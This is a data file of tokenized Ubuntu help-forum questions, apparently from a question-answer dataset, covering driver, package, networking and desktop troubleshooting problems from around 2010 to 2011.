17233	what is the better netbook os for me- jolicloud or kubuntu netbook edition ?	i 've been considering either jolicloud or kne for my future netbook . it 's going to be a dual core intel atom cpu and will have 512mb gfx , so resources should n't be a problem . one thing though : should i use jolicloud os or kubuntu netbook edition ? note i will be dual booting windows 7 , which will be my 'working ' os . i will use jolicloud/kne for web browsing , 'tinkering ' around , etc . i want a 'complete ' feeling from my netbook while not making it feel like a desktop/laptop . this will be my primary working computer ( but , as i said , i 'll use w7 for my work ) . what os would you suggest i use ? jolicloud or kubuntu netbook edition ? i 've trialed jolicloud via google chrome , but it just does n't feel right . kne looks much nicer too ; and it feels more complete . what should i use ? any personal experiences ?
17236	how to install ochem for texlive	i found this package for latex that gives me the ability to typeset organic structural formulae and reaction schemes for chemistry . i 'm having trouble with installing it though . i read through the installation steps in the manual and it tells me that i need to edit the install.cfg.unix file which contains : [ path ] bindir=/usr/local/ochem m4bindir=/usr/bin incdir=/usr/local/ochem dvipsdir=/usr/local/tetex/dvips/ochem styledir=/usr/local/tetex/tex/latex/ochem moduldir=/usr/local/ochem docdir=/usr/local/ochem/doc [ system ] system=unix so i edited the file to this : [ path ] bindir=/usr/share/ochem m4bindir=/usr/bin incdir=/usr/share/ochem dvipsdir=/usr/share/texmf-texlive/dvips/ochem styledir=/usr/share/texmf-texlive/tex/latex/ochem moduldir=/usr/share/ochem docdir=/usr/share/ochem/doc [ system ] system=unix when i try to install the package , it says that it works , but when i try to typeset one of the examples , it tells me that it ca n't find ochem.sty . i then tried navigating to the directories that the install was supposed to make and they did n't exist . so i made the directories manually and tried the install again . i still get the missing ochem.sty error . did i edit install.cfg.unix correctly ? my latex distribution is texlive 2009 on ubuntu 10.10 . edit : i did try running sudo texhash and it still does n't work .
17241	how can i adjust the scroll speed of my mouse manually ?	i have a wireless mouse device and i would like to speed-up the scrolling . i found a hint that tell us to install gpointing-device-settings . unfortunatelly this program is not working in lucid.trying to running it one get a segmentation fault error , so i went here to ask how to manually speed up scroll ? gsynaptics is also not working for me .
17244	minecraft : slow performance out of the game	i downloaded minecraft yesterday to see what the fuss is about , brilliant game ! when playing in windowed mode , if i try and do anything else , i.e . use the computer , when the game is paused , the computer is incredibly slow , it takes a minute just to type a short message into empathy . also , once i quit the game , the computer remains slow for about 5 minutes , until it magically frees up and becomes fast again . could this be related to the 512mb ram limitation of java , and the machine is swapping ? even trying to submit this post is incredibly slow and frustrating , it 's taking me a minute just to click in the 'tag 's box . any ideas ? ubuntu 10.10 x64 intel q9550 4gb ram nvidia 8800gts 320mb ( w/prop drivers installed )
17249	how do i use the gconf editor ?	i see some answers where people post to set a key in the gconf-editor , however there is no entry for gconf-editor in my menu . how do i run it and how do i use it to set keys that people recommend ?
17251	how to make an ubuntu live usb stick in fedora ?	i have fedora installed on my desktop and i want to make a live usb stick with ubuntu to install it on a laptop . what 's the easiest way to do it ?
17252	audio cds will not auto-mount correctly	when i try to play any audio cd in ubuntu 10.10 the following message appears . what is causing this problem with mounting an audio cd in the ubuntu environment ? i need to resolve this issue because i am trying to rip a couple of cds , and i would like to see how it goes in ubuntu 10.10 . thank you in advance for support : )
17256	ca n't get wireless rt2x00usb driver to work , and ca n't blacklist it	after a two year hiatus to linux , i try it again out again . and then i run into to driver issues ... i have an old linksys wusb54g v4 wireless usb adapter . in previous versions i had to use a combination of ndiswrapper and wicd to hope of getting it working . in 10.10 , apparently there are built in drivers for it . unfortunately they do n't work . fails to connect to my wpa network , fails to connect to my open unencrypted network . wicd fails at `` obtaining ip address '' or when using static ips fails at verifying connectivity to network . getting fed up i tried the ndiswrapper approach . installed and configured , but still not working , even when blacklisting the rt2570 module . so for some debugging i added some lines to my /etc/modprobe.d/blacklist.conf file blacklist rt2570 blacklist prism54usb blacklist rt2x00lib blacklist rt2x00usb restart and find this : lordquackstar @ quackbeast : /etc/modprobe.d $ lsmod | grep rt2 rt2500usb 18049 0 rt2x00usb 9779 1 rt2500usb rt2x00lib 27275 2 rt2500usb , rt2x00usb led_class 2633 1 rt2x00lib mac80211 231541 2 rt2x00usb , rt2x00lib cfg80211 144470 2 rt2x00lib , mac80211 seems to be ignored ... tried this : lordquackstar @ quackbeast : /etc/modprobe.d $ sudo rmmod -f rt2x00usb error : removing 'rt2x00usb ' : resource temporarily unavailable lordquackstar @ quackbeast : /etc/modprobe.d $ sudo rmmod -f rt2x00lib error : removing 'rt2x00lib ' : resource temporarily unavailable and could n't connect . restarted and was back to the same modules loading . maybe there 's something in the log : lordquackstar @ quackbeast : /etc/modprobe.d $ tail -n100000 /var/log/syslog | grep rt2 dec 13 19:01:15 quackbeast kernel : [ 23.698056 ] registered led device : rt2500usb-phy0 : :radio dec 13 19:01:15 quackbeast kernel : [ 23.698140 ] registered led device : rt2500usb-phy0 : :quality dec 13 19:01:15 quackbeast kernel : [ 23.701680 ] usbcore : registered new interface driver rt2500usb dec 13 19:01:15 quackbeast networkmanager [ 855 ] : < info > ( wlan0 ) : new 802.11 wifi device ( driver : 'rt2500usb ' ifindex : 4 ) dec 13 19:17:47 quackbeast kernel : [ 23.521759 ] registered led device : rt2500usb-phy0 : :radio dec 13 19:17:47 quackbeast kernel : [ 23.521824 ] registered led device : rt2500usb-phy0 : :quality dec 13 19:17:47 quackbeast kernel : [ 23.524740 ] usbcore : registered new interface driver rt2500usb dec 13 19:17:47 quackbeast networkmanager [ 798 ] : < info > ( wlan0 ) : new 802.11 wifi device ( driver : 'rt2500usb ' ifindex : 4 ) seems to be autoloading . so this means that even if i pull it out , remove the module , and get it working , it still wo n't work when its plugged in all the time . more info : lordquackstar @ quackbeast : /etc/modprobe.d $ sudo lshw -c network *snip* *-network description : wireless interface physical id : 1 bus info : usb @ 1:2 logical name : wlan0 serial : 00:12:17:9b : f3:1e capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2500usb driverversion=2.6.35-24-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bg usb : lordquackstar @ quackbeast : /etc/modprobe.d $ lsusb | grep -i rt bus 001 device 003 : id 13b1:000d linksys wusb54g v4 802.11g adapter [ ralink rt2500usb ] any suggestions on how to either fix the rt2x00usb driver or permanently block it from loading ? note that i already have ndiswrapper installed
17260	various issues linked to my cd drive , when it has a disc in it	when i go to the desktop and click on a media icon ( for my flash drive , a cd , whatever it is ) , the following problems occur , in this approximate sequence : nautilus will close if it 's open . the desktop icons disappear my window list shows a button that says `` starting file manager '' the icons reappear the button in window list disappears because of this problem , i can no longer drag and drop media , nor can i right-click to perform actions such as `` eject '' and `` safely remove drive '' . the same symptoms occur if i click a media icon ( that is also present on the desktop ) in nautilus ' computer view , though notably not if i click in the places list on the left . i have confirmed that this problem happens only if there is a cd in the drive ( matshita ujda360 ) . also , inserting a disc into the cd drive appears to kill all running programs and restart nautilus ( or x ; i 'm not sure ) . applications like brasero and rhythmbox will not start while there is a disc in the drive . removing the disc does n't result in the list of media updating ; it must be forced to update by clicking on one of the desktop icons and going through one of the above-described cycles . it does n't seem to matter what type of disc is in the drive . this has happened with cd-rws i burned years ago using roxio on windows xp , the ubuntu disc i installed from ( burned with infrarecorder portable under windows xp ) , and the retail game disc for star trek armada ii . the first indication of a problem was brasero dying when i tried to insert a disc for erasure and rewriting . since then , i 've drafted several different questions on various issues , finally combining them into this one when i realized that having a cd in the drive was the common link . could this be a simple driver issue ? if ubuntu is dynamically detecting my hardware on boot , can i specify drivers for devices that i know will be a problem if the default files are used ? i 'm beginning to think that my laptop , an old dell inspiron 2650 , is just too old or proprietary-driver-hungry ( or something , maybe ram-starved ) for ubuntu and windows xp to play nicely alongside each other . or maybe i just need to carefully take my wall-wart machine to a coffee shop for an afternoon so i can download updates and such from the internet , as i lack a home connection . tail /var/log/messages $ tail /var/log/messages feb 14 02:17:19 ubuntu2650 kernel : [ 27.997962 ] [ drm ] nouveau 0000:01:00.0 : allocating fifo number 1 feb 14 02:17:19 ubuntu2650 kernel : [ 27.999175 ] [ drm ] nouveau 0000:01:00.0 : nouveau_channel_alloc : initialised fifo 1 feb 14 02:17:22 ubuntu2650 kernel : [ 31.042600 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=0 feb 14 02:17:25 ubuntu2650 kernel : [ 33.352617 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=0 feb 14 02:17:39 ubuntu2650 pulseaudio [ 1281 ] : ratelimit.c : 2 events suppressed feb 14 02:18:27 ubuntu2650 pulseaudio [ 1281 ] : ratelimit.c : 1 events suppressed feb 14 02:18:36 ubuntu2650 kernel : [ 105.189977 ] show_signal_msg : 9 callbacks suppressed feb 14 02:18:36 ubuntu2650 kernel : [ 105.189989 ] nautilus [ 1463 ] : segfault at a349000 ip 04fdb446 sp b33d5f90 error 4 in libbrasero-media.so.1.2.0 [ 4fca000+21000 ] feb 14 02:18:48 ubuntu2650 kernel : [ 116.282854 ] nautilus [ 1486 ] : segfault at 85cb000 ip 01c1c446 sp ae706f90 error 4 in libbrasero-media.so.1.2.0 [ 1c0b000+21000 ] feb 14 02:20:06 ubuntu2650 kernel : [ 194.935572 ] nautilus [ 1557 ] : segfault at 9b59008 ip 03ea2446 sp af024f90 error 4 in libbrasero-media.so.1.2.0 [ 3e91000+21000 ]
17261	how can fix hdmi hdtv overscan when i my tv has no aspect ratio setting ?	i have a 32 '' vizio hdtv . it 's a few years old , but running well . i just connected a new nettop to it using hdmi out . it 's the intel 3x00 graphics chipset . i 'm seeing overscan , where the resolution in ubuntu is set to 1280x720 , but the tv itself is 1366x768 . when i go into the monitors control applet , i can not change the resolution to anything other than the current or 640x480 . a user had a similar overscan problem , but fixed the overscan by adjusting his tv 's aspect ratio settings . i do not have that luxury . is there a way i can do this without having to delve into xorg.conf or other command-line craziness ? i 'm more than comfortable doing so , but there must be a cleaner way . i 'm running ubuntu natty , keeping up with updates and such . here 's the output of lspci : colin @ bricktop : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 12 ) 00:04.0 signal processing controller : intel corporation core processor thermal management controller ( rev 12 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 02:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) 03:00.0 network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 )
17263	synchronizing contacts and bookmarks in ubuntu one failure	i am using ubuntu 10.10 with all upgrades . ubuntu one will sync files very good but it will not sync the contacts or bookmarks . i have done the troubleshooting steps of removing all mention of couchdb from the passwords list , installed the bindwood add-on in firefox , and even reinstalled couchdb . it still will only sync the files . anybody know what should be done ? i am not a seasoned veteran of linux but am learning , so am looking to those that know how this works for your input . this is what happens when i try this answer . dendox @ ubuntu-desktop : ~ $ killall beam.smp beam beam.smp : no process found dendox @ ubuntu-desktop : ~ $ dendox @ ubuntu-desktop : ~ $ rm ~/.config/desktop-couch/desktop-couchdb.ini dendox @ ubuntu-desktop : ~ $ dendox @ ubuntu-desktop : ~ $ dbus-send -- session -- dest=org.desktopcouch.couchdb -- print-reply -- type=method_call / org.desktopcouch.couchdb.getport error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken .
17268	sharing an internet connection through the ethernet port	i have a small living room pc ( bohica , running fully-updated ubuntu 10.10/maverick ) connected to my hdtv that i use for web browsing and media streaming . it connects via wifi ( wlan0 ) to my fedora server ( snafu ) that in turn connects to the internet . i use static addressing , and everything has been working fine . i just got a blu-ray player , and i 'd like to give it wired network access to the internet via bohica 's available wired ethernet port ( eth0 ) . so far , i have n't been to get eth0 and the network configured to get the blu-ray player talking to the internet . here 's my wlan0 configuration : ip4 addr : 192.168.0.100 mask : /24 ( 255.255.255.0 ) gateway : 192.168.0.4 ( fedora box ) the blu-ray player is set to an ip of 192.168.0.98/24 , with the same gateway as above . i want eth0 set to an ip of 192.168.0.99/24 , but when i do this using nm-connection-editor i lose internet access ( the system tries to use eth0 as the default internet access interface ) . how do i get my blu-ray player to talk to the internet through bohica , and do so without disrupting my current ( working ) network ? thanks . edit : here 's the relevant output from nm-tool with the blu-ray player connected : $ nm-tool networkmanager tool state : connected - device : eth0 type : wired driver : forcedeth state : disconnected default : no hw address : 90 : fb : a6:2c:94:32 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on - device : wlan0 [ wlan0 ] type : 802.11 wifi driver : ndiswrapper state : connected default : yes hw address : 00:26:5a : c0 : d0:05 ipv4 settings : address : 192.168.0.100 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.4
17269	ideapad s10 : cooling fan stopped working after i updated today ( 12-13 )	everything was working well until this afternoon when i updated 11.04 , now my cooling fan is n't turning on . i tried getting a fan controlling program but that did n't work .
17270	why wo n't my linux computers recognize a restarted router without a reboot themselves ?	it seems every linux machine i 've ever worked on , when the router was restarted , the computer required a reboot too . all the windows machines rejoined the network just fine . why wo n't my linux computers recognize a restarted router without a reboot themselves ? edit : i run 10.04 , it 's a desktop , wired connection , the router is windstream 2wire i 'm not sure what model but i did find `` 2701hg '' on it . i 'm not sure what pc hardware is relevant here , the motherboard ?
17271	brasero and k3b : problems to burn data dvd 's with files having spaces in its name	i decided to move from lucid to maverick in my office computer and i wanted to make a backup of some files on dvd . for this i tried brasero and them k3b , both programs are not working with if the folder or files inside them have at least one space character . the most part of my files have space in its name so it would be a pain to rename all of them . 01- if i understood correctly , this problem is related to a kernel issues and not to these specific softwares am i right ? 02- i ask the archive manager to create a rar file broking the back up in files of 600mb . in this way i was able to burn them but they are not accessible from archive manager . is this related to the size i chose to broke them ? 03- is there any other workaround or fix that i could use to make this backup on dvd 's ? thanks .
17274	how to pause/resume transfer of large files ?	i recently had to copy about 20 gb of data split between about 20 files from my laptop to an external hard drive . since this operation takes quite a while ( at ~560kb/s ) , i was wondering if there was any way to pause the transfer and resume it later ( in case , i need to interrupt the transfer ) . as a side question , is there any performance difference between copying from the terminal vs copying from nautilus ?
17275	progress and speed with 'cp ' ?	when copying files using cp , is it possible to display the progress and speed of the transfer ? otherwise , is there any alternative command line utility that can achieve this ?
17281	unconfigured package error : package apache2.2-common is not configured yet	while executing apt-get install python-setuptools or apt-get upgrade , there are about a dozen of dependency errors , the top three are : apt-get install python-setuptools reading package lists ... done building dependency tree reading state information ... done python-setuptools is already the newest version . the following packages were automatically installed and are no longer required : update-notifier-common libfile-copy-recursive-perl update-inetd librpmio0 librpm0 libmpfr1ldbl cpu-checker liblzma1 cvs librpmbuild0 gnupg-curl libcurl3-gnutls info use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 11 not fully installed or removed . after this operation , 0b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up procps ( 1:3.2.8-9ubuntu3 ) ... start : job failed to start dpkg : error processing procps ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of udev : udev depends on procps ; however : package procps is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of plymouth : plymouth depends on udev ( > = 149-2 ) ; however : package udev is not configured yet . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of apache2.2-common : apache2.2-common depends on procps ; however : package procps is not configured yet . dpkg : error processing apache2.2-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already pkg : dependency problems prevent configuration of apache2-mpm-prefork : apache2-mpm-prefork depends on apache2.2-common ( =2.2.16-1ubuntu3.1 ) ; however : package apache2.2-common is not configured yet . dpkg : error processing apache2-mpm-prefork ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already i think the python-setuptools was installed , however there are a bunch of these unconfigured packages . how can they be fixed or configured ?
17290	window preview is not working in dockbarx	i have installed dockbarx using an article at omgubuntu . http : //www.omgubuntu.co.uk/2010/12/new-look-dockbarx-hits-ppa/ . the problem is that the window preview feature is not working . update : while running dockbarx_factory.py run-in-window , i get the following warning : ** ( dockbarx_factory.py:3820 ) : warning ** : trying to register gtype 'wnckwindowstate ' as enum when in fact it is of type 'gflags' ** ( dockbarx_factory.py:3820 ) : warning ** : trying to register gtype 'wnckwindowactions ' as enum when in fact it is of type 'gflags' ** ( dockbarx_factory.py:3820 ) : warning ** : trying to register gtype 'wnckwindowmoveresizemask ' as enum when in fact it is of type 'gflags' dockbarx init dockbarx reload opened window matched with gio app on id : empathy opened window matched with gio app on id : gnome-terminal . how can i enable the preview ? .
17294	map caps-lock key to middle mouse click	since i rarely use caps-lock , i 'd like to map the key to a middle mouse click instead . i would also like to map alt+caps lock to the original function of the caps lock key , should i ever need it . i can map any keyboard shortcut to xdotool click 2 , but the gnome keyboard shortcuts dialog wo n't let me assign a command to the caps-lock key , even with modifiers . i know this is a bit of a strange undertaking ; how would i go about doing it ?
17295	error installing a package : `` trying to overwrite directory /usr/share/pixmaps ''	i 'm trying to install a package from a ppa i 've added . ( yes , i 'm the author of the package if that helps in any way . ) running a simple install command yields the following : xxxxx @ xxxxx : ~ $ sudo apt-get install opentracks [ sudo ] password for xxxxx : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : opentracks 1 upgraded , 0 newly installed , 0 to remove need to get 1,834kb of archives . after this operation , 184kb of additional disk space will be used . ( reading database ... 218827 files and directories currently installed . ) preparing to replace opentracks 0.0.2-1 ( using ... /opentracks_0.0.5-1_amd64.deb ) ... unpacking replacement opentracks ... dpkg : error processing /var/cache/apt/archives/opentracks_0.0.5-1_amd64.deb ( -- unpack ) : trying to overwrite directory '/usr/share/pixmaps ' in package mysql-query-browser 5.0r14+opensuse-2.1 with nondirectory dpkg-deb : subprocess paste killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/opentracks_0.0.5-1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have emphasized the error ... it seems like something is trying to overwrite /usr/share/pixmaps for some strange reason . what could cause such an error ?
17299	what do the different colors mean in the terminal ?	what does the different colours in ubuntu mean ? for example , when i type 'ls ' in one of my folders , i get one of the files in light green , the other ( which is a folder ) in blue with green high lighting . what does those colours mean , and there is any manual about all the colours ?
17302	i updated to ubuntu 11.04 and it broke my installation	i tried to update to natty narwhal with update-manager -d and then i followed through everything and then when i restarted everything broke . told me to put in some code or something but then after i restarted i could n't find where to put the code in .
17305	netbook remix 10.04 to 10.10 upgrade using alternate iso	i 'm using netbook remix 10.04 now . i 'm having the 10.10 alternate iso with me . if i use that iso to upgrade , will i lose my netbook version ? i 've seen in some forums that the upgrade resulted in a change from netbook version to desktop version . updated on 15/12/2010 i upgraded the os from 10.04 to 10.10 . but i 'm getting an error like this after restart : modprobe : fatal : could not load /lib/modules/2.6.35-22-generic/modules.dep : no such file or directory i searched in the forums and got a solution like this : open terminal gksudo gedit /etc/initramfs-tools/initramfs.conf change the line modules=most to modules=dep then use synaptic ( system > administration > synaptic package manager ) to reinstall initramfs-tools . i 'll be definitely trying this later . after that when the system tries to login , my screen starts flashing with just the ubuntu netbook desktop wallpaper on the screen . no other options will be available . it will be flashing continuosly . if i press the power button then one window comes up with options like shut down , restart , hibernate etc . and the screen wo n't stop flashing either . i 've uploaded a 1 min video . please go through it as it will give you a clear idea of the error which i 'm facing now video link here
17309	video converter : ogv to avi ( or another more common format )	i 've been using recordmydesktop to record stuff . a little slow to compile but it records fine . however , when i try to convert from ogv to avi ( i 've used devede and an mencoder script ) the audio and video go out of sync . here 's the script for reference : # ! /bin/bash # ogv to avi # call this with multiple arguments # for example : ls * . { ogv , ogv } | xargs ogv2avi n= $ # ; echo `` converting $ n files ! '' for ( ( i=0 ; i < = ( n-1 ) ; i++ ) ) do echo `` converting '' $ 1 filename= $ { 1 % . * } # mencoder `` $ 1 '' -ovc xvid -oac mp3lame -xvidencopts pass=1 -o $ filename.avi mencoder `` $ 1 '' -o $ filename.avi -oac mp3lame -lameopts fast : preset=standard -ovc lavc -lavcopts vcodec=mpeg4 : vbitrate=4000 shift 1 done are there good reliable video converters out there ? : )
17315	quick way to temporarily disable compiz and gnome shortcuts	compiz and gnome have many keyboard shortcuts . examples are ctrl+alt+l for locking the session or ctrl+alt+arrows for switching workspaces . often they overwrite shortcuts in applications . it would be nice to have a way to temporarily disable these system shortcuts to make way for application shortcuts . best thing would be to have a shortcut for doing so . : ) any solutions , ideas ?
17316	plans to make android apps run on ubuntu abandoned ?	i remember a longer time ago there was an anouncement that some ubuntu developers were planing to bring the possibility to ubuntu to run android apps on an ubuntu and planned to write an environment for this purpose . since this announcement i hav n't heard again anything about this plans . and via google nothing could n't be found . are these plans abandoned ?
17322	autostart firestarter gui on boot ?	since firestarter gui needs admin rights to start , does it make sense to autostart firestarter on boot and how can i do it ?
17327	is it possible to use empathy 2.32 on gnome 2.30 ?	i 'm running ubuntu lucid which contains the gnome 2.30 . the thing is that , i 'm really interested on using empathy 2.32 , since it fixes a lot of bugs . however i do n't want to upgrade the entire system but i really want the new version of empathy :3 . i tried using ppa or other methods but no luck . any idea ?
17328	usb devices off when i power on my laptop	i have a big problem . sometimes ( not always ) , when i power on my laptop , my usb devices ( mouse , keyboard and other ) do n't work . all devices work , indicators are on , but it does n't work in ubuntu . and sometimes , when i do n't use my laptop , usb devices do n't work too . i came to my laptop , try to do anything , but i have not results and i have to reboot my laptop . what can i do ? before this , when i 'd used only windows 7 , i did n't have this problem .
17331	monitor screen dead ... ..not even shows bios screen	re : /host/ubuntu/disks/root.disk does not exist : ( alert ! /host/ubuntu/disks/root.siak does not exist . dropping to a shell ! busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell ( ash ) ( initramfs ) alll thought the above problem was solved my issue now is..when i booted my pc again after this solving this to solve the above problem i had pressed e in the grub menu then corrected the partition then after starting i did sudo grub-update then i made some automatic update updates then in next reboot ... ... my screen had gone blank ... . and i am not even able to see bios screen ... .in the start ... the monitior just stays blank ... ... ... ... ... ... i have even tried disconnectiong my hard disk but still not able to get the display ... ... solution required ... .urgently ... ..
17332	how can i move an encrypted home directory to another partition ?	how can i move a enrypted home directory to another partition ? are there differences between moving an unencrypted home directory to another partition and an encrypted home directory ? perhaps does ubuntu installer offer an option to place your home directory on an other partition ?
17333	boot from usb on a macbook	how do i boot from usb on a mac ? mac os x crashed on that pc and i want to make the owner switch to ubuntu .
17338	how do i create a cube effect for pdf presentation transitions ?	i already saw in the past some presentations made with a 'cube effect ' transition , similar to the 3d-multiple desktop of compiz . i heard 'keynotes ' on mac osx could do that . is it possible to do the same on ubuntu with pdf presentations ? i tried pdfcube but it did not really kept its promises .
17339	how safe is it to install ubuntu on a windows 7 pc - repartitioning the disk ?	i am going to install ubuntu on a brand new pc , which comes with some oem installation of windows 7 . i know that ubuntu can resize an existing windows ntfs partition , so that it has free space to install . however , i am not sure how safe it is , and i 'd like opinions , and tips'n'tricks on what i can do to avoid problems . the pc does not contain any data and i will have the recovery disk . merci !
17353	remove keyring popup on startup	i forgot my password recently , so i had to use ubuntu 's recovery mode to change it to something else . i used this command : passwd username and i was then prompted for the new password . then i rebooted and logged in . everything went very smoothly , except that now everytime i log in i see this pop-up 3 times before i can do anything else : i 've tried entering my current password but that does n't work . how can i get this annoying pop-up to stop showing up ? i looked at this question however the checkbox to make this connection available to all users is disabled for me .
17361	create a launcher for kile built from source ?	i just installed the latex editor kile from source on my ubuntu 10.04 with kde ( i know it is also available in the package-manager , however if you install it from there it will install texlive 2009 which i do n't want ) . the documentation of kile says : you can start kile with the following command : kdedirs= $ home/kile-install : $ kdedirs $ home/kile-install/bin/kile this works fine , however it would be much more convenient to have this as a symbol-launcher on my workspace desktop . how can i create a launcher from this command given above so that i can start kile with a double-click on an icon ?
17367	upgrade vs clean install	i 've been trying for months to upgrade my ubuntu 8.10 to 10.04 and have been told that i can not because of my ati radeon xpress m200 card . i finally got tired of not being able to get things from the repository , so i did a clean install from a cd . i have a 64-bit laptop . the clean install went fine and 10.04 seems to have no problems with the ati card . why was the upgrade telling me it could n't do it ? i thought i would have to scrap this laptop and get another . in fact , i did buy another one with 10.04 as a backup for when this one finally quit . any ideas ?
17369	how can i play mp3 files or videos ?	just installed ubuntu on my lenovo g460 with windows 7 . i am not able to play any movie or mp3 file . when i click on a file its asks me to install a plug in . when go on install it after click on install button nothing is invok .
17379	which graphics driver alternatives do i have for intel hd graphics ?	having an arrandale-based notebook with an on-die intel gpu , which graphics drivers can and should i use ?
17381	unity does n't load , no launcher , no dash appears	when i login , nothing happens . i am presented with my desktop wallpaper . no dash , no launcher , nothing .
17388	how can i create a new partition with mountpoint by splitting an existing partition ?	how can i split an existing partition ( ntfs ) to get space for a new partition and create a mountpoint for it ?
17401	stop printing test page everytime on hp psc 1410	everytime i switch on my desktop running and start the hp psc 1410 , it will print a test page . i have recently installed the hplip driver ( the latest one on the hplip website ) and the driver installed correctly . i dont know what pp-build=no is , but it was mentioned somewhere that it should be =yes . please suggest what to do to stop this test page printing everytime . i have tried putting the test page on scanner and scanned a couple of times to align the cartridges but that wo n't work .
17402	which partitioning program does ubuntu use during installation ?	which partitioning algorithms use ubuntu during the installation , is it also available as a standalone application or command ? is it gparted ?
17403	fix for blinking nvidia gtx 460m ?	i have an asus g73-jw laptop and on official drivers , it will blink every time that the powermizer will change the speed of the card . the only workaround i have found so far is to set it to maximum performance but , this is not a viable workaround as it is always maxed out so , lots of heat ... any ideas ?
17414	my mouse wheel has stopped scrolling up and down	my mouse wheel has stopped working . it does n't scroll up and down when previously it worked . how can i configure what each button of the mouse does ? thanks
17419	dsl connection using networkmanager in kde does not seem to work	i have installed kubuntu 10.10 alongside windows 7 . in kubuntu 10.10 i tried to connect to internet using the dsl connection tab in the networkmanger on the taskbar - > manage connection - > dsl . i gave the username , password , ip address ( manually ) etc . checked the box of `` connect automatically '' . the system connection checkbox was grayed out so i could not do anything to it . then i clicked apply . but the connection that had just created did n't appear in the available connections . as there was no connection named that i created using dsl tab i could not connect to internet . i used to connect to internet using the same method in ubuntu 's networkmanager . is this some kind of bug in kde 's network manager ? how can i solve it ?
17421	how to layout application icons in the panel ?	application and applets icons are changing their position or even disappears from the gnome-panel ( see an example ) . it often happens after connecting to external monitor with different resolution setting , or sometimes happens by chance ( i do n't know what is the reason of such behaviour ) . some icons i can move , others i ca n't . i do n't know if they 're locked or not . my question is : is there any settings/software for icon 's position control in the panel ? i noticed that locking does not resolve this issue . thank you for support .
17425	how can i install 'revenge of the titans ' ?	revenge of the titans is one of the games from the humble indie bundle . i downloaded the i386 .deb file ( i 'm on a 32bit installation ) and tried to install it using the software centre . however , when it was nearly finished i got this error : i then tried to install it using dpkg and it failed to install , giving the following error : dpkg : error processing revengeofthetitans-hib-i386.deb ( -- install ) : unable to create `/opt/revengeofthetitans/full_length_music/einleitung.mp3.dpkg-new ' ( while processing `/opt/revengeofthetitans/full_length_music/einleitung.mp3 ' ) : no such file or directory how can i resolve this ?
17427	can i remove `` free space '' text from the nautilus status bar ?	i want to remove the part in nautilus that shows free disk space . in theory it may useful but it 's so badly designed , every time i select some files my eye gets drawn to `` 15 gb '' instead of the actual size of the files . and with no files selected , it says something like `` 24 items , free space 15gb '' which at a quick glance looks like the total size of the files . i 've looked through the preferences and do n't see anything . i 'm using ubuntu 10.10 with nautilus 2.32.0 .
17428	anti virus / anti malware software	do i need anti virus / anti malware software ? which sw do you recomend ? where do i get it ? im new to ubuntu .
